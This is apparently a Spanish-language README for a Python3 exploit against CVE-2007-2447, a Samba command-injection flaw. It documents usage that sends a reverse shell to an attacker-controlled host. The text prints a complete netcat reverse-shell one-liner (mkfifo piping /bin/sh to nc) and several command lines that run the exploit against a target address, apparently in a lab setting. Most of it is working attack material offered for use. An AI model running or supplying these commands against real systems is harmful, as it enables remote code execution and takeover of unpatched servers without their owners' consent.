
Código de exploit para CVE-2007-2447 escrito en Python3.
Este repositorio contiene mi código de exploit para CVE-2007-2447 escrito en Python3. Por defecto envía una reverse shell de Netcat OpenBSD en el puerto 443 al host objetivo, pero también puedes especificar un comando personalizado.
# Reverse shell de Netcat OpenBSD
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
# Explotar objetivo 10.129.232.46 en el puerto 445, enviar reverse shell a 10.10.14.82 en el puerto 443
python3 CVE-2007-2447.py --rhost 10.129.232.46 --lhost 10.10.14.82
# Con rport y lport personalizados
python3 CVE-2007-2447.py --rhost 10.129.232.46 --rport 4445 --lhost 10.10.14.82 --lport 31337
# Ejecutar comando personalizado y establecer tiempo de espera para hosts lentos
python3 CVE-2007-2447.py --rhost 10.129.232.46 -c "ping -c 3 10.10.14.82" -t 10